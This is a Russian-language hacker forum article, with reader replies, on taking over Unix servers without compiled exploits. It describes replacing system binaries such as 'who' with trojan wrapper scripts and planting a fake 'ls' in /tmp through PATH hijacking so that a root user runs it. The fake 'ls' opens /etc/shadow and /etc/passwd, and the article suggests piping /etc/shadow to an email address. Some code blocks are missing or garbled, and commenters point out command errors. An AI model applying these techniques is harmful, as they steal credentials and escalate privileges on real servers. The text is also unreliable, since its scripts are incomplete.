![]() |
Захват никсов без сплойтов
Re Achat ;)
Бывает особо параноидальные админы удаляют с серваков компиляторы. Пытаемся установить гцц из рмп пакета... ааах облом он не работает -) Скомпиленные на других машинках сплоиты явно отказываются работать, ругаясь на сегоднящний дождь/жару и просто плохое настроение.. Что делать? вот и задумался.. пока не натолкнулся на одном из форумов на интерестную идейку, которая в принципе известна, но вот решил расписать ее поподробней.. Его может юзать как админ так и ты, c00l m3g4 h4x0r =) Итак приступим. Если брать в расчет админа, то ему провернуть все это намного легче, т.к. он уже "по условию задачи" обладает рутом ) Что проделываем хакер, проникая в систему? чаще всего юзает команды типа ls, last, who, id, which, uname и т.д. И основная задача админа в случае проникновения взломщика установить своеобразные ловушки на эти команды. Постойте, у нас же нет компилятора? Зато у нас есть руки =) Все можно проделать с помощью перля, питона или просто средстави нашых никсов. Возьмём к примеру who. Определим где она у нас находится следущим образом: Код:
which whoПрава на неё равны –rwxr-xr-x, что сопостовимо с 755. Переименовываем who например в who_new. Делаем это следующим образом: Код:
mv /usr/bin/who /usr/bin/who_newКод:
сhmod 755 /usr/bin/who_newКод:
сat /usr/bin/whoПервая и вторая строчка надеюсь понятна, третья же отправляет тебе на почту то, что выдала команда id с заголовком Your Base_Is_Under_Attack -) Ключ -n передает заголовок письма, -s запретит просмотр /etc/mail.rc, чтобы хацкер ничего не заподозрил. Этим способом можно подменить любую исполняемую программу, главное запомнить что и как менял , а лучше записать на бумажке -)) ---------------------------------------- Да, все отлично - скажите вы.. А как быть, если права у тебя не root, а жалкие nobody или обычного юзера? Работа с исполняемыми файлами в основном в таком случае запрещена. Но у нас есть еще один инструмент в арсенале - переменная окружения PATH Поэксперементируем с ls Допустим у нас есть права на запись в /tmp. Тогда создадим следущий файл под названием ls. Запишем в него следущие строчки: Код:
#! /bin/sh Код:
сhmod 777 /tmp/lsИтак теперь если у пользователя хватит прав на изменение прав (скорее всего у рута), то /etc/shadow и /etc/passwd откроются для всеобщего обозрения -) Можно вставить в нашу фэйковую ls что-то вроде cat /etc/shadow | mail your@mail (просто отсылает зашифровынные пароли на мыло). Вобщем тут можно делать все что хочешь) Единственное что может делать админ в этом случае - проверять переменную PATH, убрать ставящиеся по дефолту права,либо задавать полный путь до исполняемого фала, т.е. для просмотра содержимого каталога вводить каждый раз /bin/ls -lia.. Даже законченный параноик не будет этого делать... В статье мы научились захватывать сервак без использования палевных сплойтов, рушивших систему или просто не работающих =) Special For Achat (c) blackybr PS т.к. многим личностям оказалось непонятно, то поясняю.. для превого случаю нужен РУТ (т.к. по условию вы админ!) ДЛя второго нужен просто юзэр доступ! |
Молодец!!!
Мне понравилась твоя статья |
Накатал аж на + :)
Статья хорошая |
Хорошая статья!
|
Статья в норме, но можно и получше...
|
Цитата:
|
/usr/bin/who
/usr/bin/who_new |
нашел пока 1
mv вместо mw =) |
Вроде правильно так: mv usr/bin/who usr/bin/who_new
|
Я думаю, нерезус имел в виду, что во втором коде используется не /usr/bin/who_new, а /usr/bin/system_who, ну и конечто как уже сказал bl4ck-cat mv, а не mw, но ведь никто от ошибок не застрахован.
|
| Время: 00:35 |